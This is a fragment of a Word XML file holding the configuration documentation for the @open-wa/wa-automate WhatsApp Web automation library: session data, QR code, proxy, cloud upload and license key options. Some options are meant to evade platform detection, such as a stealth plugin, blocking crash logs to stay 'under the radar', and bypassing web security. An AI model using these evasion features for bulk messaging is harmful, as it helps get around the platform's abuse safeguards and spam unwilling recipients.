        <w:t xml:space="preserve">     *          console.log(sessionId, sessionDatastring)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You can set sessionData as an evironmental variable also! The variable name has to be [sessionId (default = 'session) in all caps]_DATA_JSON. You have to make sure to surround your session data with single quotes to maintain the formatting.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For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sessionId =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To set env var:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">     * ```bash</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">     *    export SESSION_DATA_JSON=`...`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where ... is copied from session.data.json this will be a string most likley starting in `ey...` and ending with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Setting the sessionData in the environmental variable will override the sessionData object in the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sessionData?: SessionData | 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There is a new way to login to your host account by entering a link code after a confirmation step from the host account device. In order to use this feature you MUST set the host account number as a string or number beforehand as a property of the config object.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linkCode: '1234567890'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linkCode?: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ALPHA EXPERIMENTAL FEATURE! DO NOT USE IN PRODUCTION, REQUIRES TESTING.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Learn more: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https://pptr.dev/#?product=Puppeteer&amp;version=v3.1.0&amp;show=api-puppeteerconnectoptions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https://medium.com/@jaredpotter1/connecting-puppeteer-to-existing-chrome-window-8a10828149e0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browserWSEndpoint?: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flag allows you to disable or enable the use of the puppeteer stealth plugin. It is a good idea to use it, however it can cause issues sometimes. Set this to false if you are experiencing `browser.setMaxListeneres` issue. For now the default for this is false.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useStealth?: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path relative to the current working directory (i.e where you run the command to start your process). This will be used to store and read your `.data.json` files. defualt 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sessionDataPath?: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Disable cors see: https://pptr.dev/#?product=Puppeteer&amp;version=v3.0.4&amp;show=api-pagesetbypasscspenabled If you are having an issue with sending media try to set this to true. Otherwise leave it set to false.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bypassCSP?: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allows you to pass any array of custom chrome/chromium argument strings to the puppeteer instance.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">     * You can find all possible arguements [here](https://peter.sh/experiments/chromium-command-line-switches/).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chromiumArgs?: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to true, skipBrokenMethodsCheck will bypass the health check before startup. It is highly suggested to not set this to true.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skipBrokenMethodsCheck?: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to true, `skipUpdateCheck` will bypass the latest version check. This saves some time on boot (around 150 ms).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skipUpdateCheck?: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name of the session. You have to make sure that this is unique for every session.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">     * @default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 order to unlock the functionality to send texts to unknown numbers, you need a License key.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">     * One License Key is valid for each number. Each License Key starts from £5 per month.</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check README for instructions on how to get a license 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Notes:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">     * 1. You can change the number assigned to that License Key at any time, just message me the new number on the private discord channel.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">     * 2. In order to cancel your License Key, simply stop your membership.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licenseKey?: LicenseKey,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may set a custom user agent. However, due to recent developments, this is not really neccessary any more.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customUserAgent?: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 can enable remote devtools by setting this to trye. If you set this to true there will be security on the devtools url.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">     * If you want, you can also pass a username &amp; password.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devtools?: boolean | DevTools,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block any network calls to crash log servers. This should keep anything you do under the radar. </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blockCrashLogs?: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false turn off the cache. This may improve memory usage.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cacheEnabled?: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the specific browser revision to be downlaoded and used. You can find browser revision strings here: http://omahaproxy.appspot.com/</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">     * Learn more about it here: https://github.com/puppeteer/puppeteer/blob/master/docs/api.md#class-browserfetcher</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">     * If you're having trouble with sending images, try '737027'.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">     * If you go too far back things will start breaking !!!!!!</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">     * NOTE: THIS WILL OVERRIDE useChrome and executablePath. ONLY USE THIS IF YOU KNOW WHAT YOU ARE DOING.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browserRevision?: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throw an error if a session is not able to get a QR code or is unable to restart a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throwErrorOnTosBlock?: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By default, all instances of @open-wa/wa-automate are headless (i.e you don't see a chrome window open), you can set this to false to show the chrome/chromium window.</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headless?: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LOCKED TO `true` AND CANNOT BE TURNED OFF. PLEASE SEE [[authTimeout]]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Setting this to true will result in new QR codes being generated if the end user takes too long to scan the QR code.</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autoRefresh?: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now has no effect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determines the interval at which to refresh the QR code. By default, WA updates the qr code every 18-19 seconds so make sure this value is set to UNDER 18 seconds!!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qrRefreshS?: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determines how long the process should wait for a QR code to be scanned before killing the process entirely. To have the system wait continuously, set this to `0`.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">     * @default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qrTimeout?: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determines how long the process should wait for a session to load fully before continuing the launch process.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">     * Set this to 0 to wait forever. Default is 5 seconds.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">     * @default 5</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waitForRipeSessionTimeout?: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features, like video upload, do not work without a chrome instance. Set this to the path of your chrome instance or you can use `useChrome:true` to automatically detect a chrome instance for you. Please note, this overrides `useChrome`.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executablePath?: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the program will automatically try to detect the instance of chorme on the machine. Please note this DOES NOT override executablePath.</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useChrome?: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sent, adds a call to waPage.authenticate with those credentials. Set `corsFix` to true if using a proxy results in CORS errors.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proxyServerCredentials?: ProxyServerCredentials,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skips logging the QR Code to the console.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qrLogSkip?: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the program will try to recreate itself when the page crashes. You have to pass the function that you want called upon restart. Please note that when the page crashes you may miss some messages.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">     * E.g:</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const start  = async (client: Client) =&gt; {...}</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">     * create({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restartOnCrash: start,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restartOnCrash?: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simplify logs for use within docker containers by disabling spins (will still print raw messages).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disableSpins?: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this will log any console messages from the browser.</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logConsole?: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this will log any error messages from the browser instance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logConsoleErrors?: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determines how long the process should wait for the session authentication. If exceeded, checks if phone is out of reach (turned of or without internet connection) and throws an error. It does not relate to the amount of time spent waiting for a qr code scan (see [[qrTimeout]]). To have the system wait continuously, set this to `0`.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    * @default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authTimeout?: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phoneIsOutOfReach check timeout</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">     * @default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oorTimeout?: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kill the whole process when the client is disconnected from the page or if the browser is closed.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killProcessOnBrowserClose?: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client will check if the page is valid before each command. If page is not valid, it will throw an error.</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safeMode?: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the process will not save a data.json file. This means that sessions will not be saved and you will need to pass sessionData as a config param or create the session data.json file yourself</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skipSessionSave?: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the process will open a browser window where you will see basic event logs and QR codes to authenticate the session. Usually it will open on port 3000. It can also be set to a preferred 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You can also get the QR code png at (if localhost and port 3000):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`http://localhost:3000/qr`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or if you have multiple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`http://localhost:3000/qr?sessionId=[sessionId]`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`false |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popup?: boolean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needs to be used in conjuction with `popup`, if `popup` is not true or a number (representing a desired port) then this will not work.</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Setting this to true will make sure that only the qr code png is served via the web server. This is useful if you do not need the whole status page.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As mentioned in [popup](#popup), the url for the qr code is `http://localhost:3000/qr` if the port is 3000.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qrPopUpOnly?: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the process will try infer as many config variables as possible from the environment variables. The format of the variables are as below:</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sessionData     ==&gt;     WA_SESSION_DATA</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">     * sessionDataPath ==&gt;     WA_SESSION_DATA_PATH</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">     * sessionId       ==&gt;     WA_SESSION_ID</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">     * customUserAgent ==&gt;     WA_CUSTOM_USER_AGENT</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">     * blockCrashLogs  ==&gt;     WA_BLOCK_CRASH_LOGS</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">     * blockAssets     ==&gt;     WA_BLOCK_ASSETS</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">     * corsFix         ==&gt;     WA_CORS_FIX</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">     * cacheEnabled    ==&gt;     WA_CACHE_ENABLED</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">     * headless        ==&gt;     WA_HEADLESS</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">     * qrTimeout       ==&gt;     WA_QR_TIMEOUT</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">     * useChrome       ==&gt;     WA_USE_CHROME</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">     * qrLogSkip       ==&gt;     WA_QR_LOG_SKIP</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">     * disableSpins    ==&gt;     WA_DISABLE_SPINS</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">     * logConsole      ==&gt;     WA_LOG_CONSOLE</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">     * logConsoleErrors==&gt;     WA_LOG_CONSOLE_ERRORS</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">     * authTimeout     ==&gt;     WA_AUTH_TIMEOUT</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">     * safeMode        ==&gt;     WA_SAFE_MODE</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">     * skipSessionSave ==&gt;     WA_SKIP_SESSION_SAVE</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">     * popup           ==&gt;     WA_POPUP </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">     * licensekey      ==&gt;     WA_LICENSE_KEY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inDocker?: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output quality of the qr code during authentication. This can be any increment of 0.1 from 0.1 to 1.0.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">     * @default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qrQuality?: QRQuality;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output format of the qr code. `png`, `jpeg` or `webm`.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`png`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qrFormat?: QRFormat;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language of the host notification. See: https://github.com/open-wa/wa-automate-nodejs/issues/709#issuecomment-673419088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hostNotificationLang?: NotificationLanguage;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block all assets from loading onto the page. This may result in some load time improvements but also increases instability.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blockAssets?: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[ALPHA FEATURE - ONLY IMPLEMENTED FOR TESTING - DO NOT USE IN PRODUCTION YET]</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">     * Setting this to true will result in the library making sure it is always starting with the latest version of itself. This overrides `skipUpdateCheck`.</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keepUpdated?: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Syncs the viewport size with the window size which is how normal browsers act. Only relevant when `headless: false` and this overrides `viewport` config.</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resizable?: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desired viewport height and width. For CLI, use [width]x[height] format. E.g `--viewport 1920x1080`.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viewport?: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Page width in pixels</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">         * @default `1440`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width?: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Page height in pixels</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">         * @default `900`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height?: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As the library is constantly evolving, some parts will be replaced with more efficient and improved code. In some of the infinite edge cases these new changes may not work for you. Set this to true to roll back on 'late beta' features. The reason why legacy is false by default is that in order for features to be tested they have to be released and used by everyone to find the edge cases and fix them.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legacy?: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Deletes the session data file (if found) on logout event. This results in a quicker login when you restart the process.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deleteSessionDataOnLogout?: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to true, the system will kill the whole node process when either an [[authTimeout]] or a [[qrTimeout]] has been reached. This is useful to prevent hanging processes.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killProcessOnTimeout?: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set to true, the system will kill the whole node process when a "TEMPORARY BAN" is detected. This is useful to prevent hanging processes.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">     * It is `true` by default because it is a very rare event and it is better to kill the process than to leave it hanging.</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killProcessOnBan?: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bypass web security. DO NOT DO THIS IF YOU DO NOT HAVE TO. CORS issue may arise when using a proxy.</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corsFix?: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Amount of time (in ms) to wait for a client method (specifically methods that interact with the WA web session) to resolve. If a client method results takes longer than the timout value then it will result in a [[PageEvaluationTimeout]] error.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 get this error, it does not automatically mean that the method failed - it just stops your program from waiting for a client method to resolve.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useful if you do not rely on the results of a client method (e.g the message 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set to `0`, the process will wait indefinitely for a client method to resolve.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">     * @default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callTimeout?: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true, this option will take a screenshot of the browser when an unexpected error occurs within the browser during `create` initialization. The path will be `[working directory]/logs/[session ID]/[start timestamp]/[timestamp].jpg`</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screenshotOnInitializationBrowserError?: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listeners may not be your cup of tea. With eventMode, all [[SimpleListener]] events will be registered automatically and be filed via the built in Events Listener.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useful because you can register/deregister the event listener as needed whereas the legacy method of setting callbacks are only be set once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eventMode?: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true, the system will automatically create a log of all processes relating to actions sent to the web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 location of the file will be relative to the process directory (pd)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`[pd]/[sessionId]/[start timestamp].log`</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logFile?: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true, the system will attempt to correct chatIds and groupChatIds. This means you can ignore `@c.us` and `@g.us` distinctions in some parameters.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idCorrection?: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Redundant until self-hostable sticker server is available.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`https://sticker-api.openwa.dev`</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stickerServerEndpoint?: string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will force the library to use the default cached raw github link for patches to shave a few hundred milliseconds from your launch time. If you use this option, you will need to wait about 5 minutes before trying out new patches.</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ghPatch?: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save a local copy of the patches.json file (as patches.ignore.data.json) which will be used in subsequent instantiations of the session. While the rest of the launch procedure is running, the library will fetch and save a recent version of the patches to ensure your patches don't go stale. This will be ignored if the cached patches are more than a day old.</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cachedPatch?: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replace the `console.table` with a stringified logging of the debug info object instead. This would be useful to set for smaller terminal windows. If `disableSpins` is `true` then this will also be `true`.</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logDebugInfoAsObject?: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will make the library log all internal wa web events to the console. This is useful for debugging purposes. DO NOT TURN THIS ON UNLESS ASKED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logInternalEvents?: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Kill the client when a logout is detected</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killClientOnLogout?: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will make the `create` command return `false` if the detected session data is expired.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will mean, the process will not attempt to automatically get a new QR code.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throwOnExpiredSessionData?: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sessions may experience issues with sending media when using proxies. Using the native proxy system instead of the recommended 3rd party library may fix these issues.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useNativeProxy?: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this to `true` to make the library work on Raspberry Pi OS.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Make sure to run the following command before running the library the first time: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&gt; sudo apt update -y &amp;&amp; sudo apt install chromium-browser chromium-codecs-ffmpeg -y &amp;&amp; sudo apt upgrade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you're using the CLI, you can set this value to `true` by adding the following flag to the CLI command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&gt; npx @open-wa/wa-automate ... --raspi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raspi?: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Default pqueue options applied to all listeners that can take pqueue options as a second optional parameter. For now, this only includes `onMessage` and `onAnyMessage`.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See: https://github.com/sindresorhus/p-queue#options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 process 5 events within every 3 seconds window. Make sure to only process at most 2 at any one time. Make sure there is at least 100ms between each event processing.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```javascript</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">     *     {   </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">     *         intervalCap: 5, //process 5 events</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">     *         interval: 3000, //within every three second window</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">     *         concurrency: 2, //make sure to process, at most, 2 events at any one time</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">     *         timeout: 100, //make sure there is a 100ms gap between each event processing.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">     *         carryoverConcurrencyCount: true //If there are more than 5 events in that period, process them within the next 3 second period. Make sure this is always set to true!!!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pQueueDefault?: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a preprocessor, or multiple chained preprocessors, for messages. See [MPConfigType](/) for more info.</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options: `SCRUB`, `BODY_ONLY`, `AUTO_DECRYPT`, `AUTO_DECRYPT_SAVE`, `UPLOAD_CLOUD`.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">     * @default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messagePreprocessor?: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an array filter to be used with messagePreprocessor to limit which messages are preprocessed.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E.g if you want to scrub all messages that are not from a group, you can do the following:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">     * `"m=&gt;!m.isGroupMsg"`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preprocFilter?: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REQUIRED IF `messagePreprocessor` IS SET TO `UPLOAD_CLOUD`.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can be set via the config or the corresponding environment variables.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cloudUploadOptions?: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`AWS`, `GCP` or `WASABI`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`OW_CLOUD_ACCESS_KEY_ID`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provider: CLOUD_PROVIDERS,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S3 compatible access key ID.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e.g: `AKIAIOSFODNN7EXAMPLE` or `GOOGTS7C7FUP3AIRVJTE2BCD`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`OW_CLOUD_ACCESS_KEY_ID`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accessKeyId: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S3 compatible secret access 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e.g `wJalrXUtnFEMI/K7MDENG/bPxRfiCYEXAMPLEKEY`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`OW_CLOUD_SECRET_ACCESS_KEY`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secretAccessKey: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Bucket name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`OW_CLOUD_BUCKET`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bucket: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Bucket region.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 required for `GCP` provider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`OW_CLOUD_REGION`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region?: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Ignore processing of messages that are sent by the host account itself</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`OW_CLOUD_IGNORE_HOST`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ignoreHostAccount?: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directory strategy to use when uploading files. Or just set it to a custom directory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env: `OW_DIRECTORY`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directory?: DIRECTORY_STRATEGY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make the uploaded file public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public?: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Extra headers to add to the upload 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headers?: {[k:string]:string}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What to do when an error is detected on a client method.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`OnError.NOTHING`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onError?: OnError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Please note that multi-device is still in beta so a lot of things may not work. It is HIGHLY suggested to NOT use this in production!!!!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Set this to true if you're using the multidevice beta.</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 :::danger</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
